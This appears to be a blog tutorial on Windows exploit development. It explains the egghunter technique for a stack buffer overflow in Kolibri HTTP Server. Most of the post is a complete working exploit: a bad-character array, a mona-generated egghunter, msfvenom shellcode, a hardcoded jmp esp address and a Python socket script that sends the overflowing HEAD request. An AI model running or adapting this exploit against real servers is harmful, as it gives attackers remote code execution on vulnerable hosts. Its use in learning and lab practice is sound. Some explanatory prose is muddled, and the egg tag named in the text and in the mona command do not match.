Windows Exploit Development: Egghunting

Hey Squad,

Hey Squad,

Hope everyone is doing great!!!

Today, we will be looking at how to exploit Kolibri HTTP Server using “Egg Hunter” method.

What is Egg Hunter?

In the normal Stack Based Buffer Overflow technique, there was as much space as we wanted to write the shellcode on the memory.

When examining an application that we suspect may be BoF, if the memory area does not have enough room for the shellcode, the shell containing the code we will send in the second part, such as ROOT or w00d, and the shellcode we sent on the memory can be loaded to a different part of the memory and given a TAG. The TAG egghunter detects it, and shellcode is run. This is the EggHunter logic.

An app that you can exploit with Stack-based BoF and Egg Hunter can look like the screenshot below on memory.

As seen in the screenshot, only 190 bytes of our shellcode could only fit. We do not have enough space.

The Solution: Egg Hunter Method

In such cases, the egg-hunter method will save lives. The egghunter shellcode we will use briefly performs the following process.

The label “w00t” is set by the code itself. The name of this label is the egg. It searches across the entirety of memory for this tag. If it does, it jumps there with the “jmp edi” instruction and executes our shellcode which is what we wanted.


Exploit Development

File: https://www.exploit-db.com/exploits/34059

Analyze the Exploit Situation

Let’s use the below script to reproduce the crash.

After looking in the Immunity Debugger, The situation is the following:

  • EIP is getting overwritten.
  • We have more than 500 bytes in the initial buffer that can be used to store the main shellcode

Redirect control to the stack

Find instructions to jump to stack using mona

!mona jmp -r esp

update the EIP in the exploit to the “jmp esp” instruction address accordingly.

Find bad characters

Once we are able to jump to esp, we should check for bad characters.

badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
payload = A *(515 - len(badchars)) + badchars + "BBBB" + "C"*400

You will observe that the badchars = “\x00\x20\x3f”

Implement the egghunter

The targeted marker tag is “w00t”. Mona can help us create such a shellcode.

!mona egg -t b33f
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8w00t\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

Final Exploit

Let’s use msfvenom for the shellcode.

msfvenom -p windows/exec cmd=calc.exe -b "\x00\x20\x3f" -f c

Full exploit code:

#!/usr/bin/python 
import socket, os, sys 
 
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8w00t\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 
sc = ("\xbf\x9a\xfc\xd9\xc5\xdb\xd3\xd9\x74\x24\xf4\x5b\x29\xc9\xb1" 
"\x31\x83\xeb\xfc\x31\x7b\x0f\x03\x7b\x95\x1e\x2c\x39\x41\x5c" 
"\xcf\xc2\x91\x01\x59\x27\xa0\x01\x3d\x23\x92\xb1\x35\x61\x1e" 
"\x39\x1b\x92\x95\x4f\xb4\x95\x1e\xe5\xe2\x98\x9f\x56\xd6\xbb" 
"\x23\xa5\x0b\x1c\x1a\x66\x5e\x5d\x5b\x9b\x93\x0f\x34\xd7\x06" 
"\xa0\x31\xad\x9a\x4b\x09\x23\x9b\xa8\xd9\x42\x8a\x7e\x52\x1d" 
"\x0c\x80\xb7\x15\x05\x9a\xd4\x10\xdf\x11\x2e\xee\xde\xf3\x7f" 
"\x0f\x4c\x3a\xb0\xe2\x8c\x7a\x76\x1d\xfb\x72\x85\xa0\xfc\x40" 
"\xf4\x7e\x88\x52\x5e\xf4\x2a\xbf\x5f\xd9\xad\x34\x53\x96\xba" 
"\x13\x77\x29\x6e\x28\x83\xa2\x91\xff\x02\xf0\xb5\xdb\x4f\xa2" 
"\xd4\x7a\x35\x05\xe8\x9d\x96\xfa\x4c\xd5\x3a\xee\xfc\xb4\x50" 
"\xf1\x73\xc3\x16\xf1\x8b\xcc\x06\x9a\xba\x47\xc9\xdd\x42\x82" 
"\xae\x12\x09\x8f\x86\xba\xd4\x45\x9b\xa6\xe6\xb3\xdf\xde\x64" 
"\x36\x9f\x24\x74\x33\x9a\x61\x32\xaf\xd6\xfa\xd7\xcf\x45\xfa" 
"\xfd\xb3\x08\x68\x9d\x1d\xaf\x08\x04\x62") 
 
shellcode = "w00tw00t" + sc 
payload1 = shellcode + "A"*(515-len(shellcode)) + "\xA4\x10\x3D\x77" + egghunter + "C"*100 #jmp esp 773D10A4 
 
buffer = ( 
"HEAD /" + payload1 + " HTTP/1.1\r\n" 
"Host: 127.0.0.1:8080\r\n" 
"User-Agent: " + "Exploit Writer" + "\r\n" 
"Keep-Alive: 115\r\n" 
"Connection: keep-alive\r\n\r\n") 
 
 
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
expl.connect(("127.0.0.1", 8080)) 
expl.send(buffer) 
expl.close()

Please give me a clap if you found it to be useful and follow me to get more hacking knowledge.

You can buy me a coffee if you would like to -> https://www.buymeacoffee.com/gowthamaraj


References

  1. https://medium.com/@orhan_yildirim/egg-hunter-how-it-works-fd0eed671b80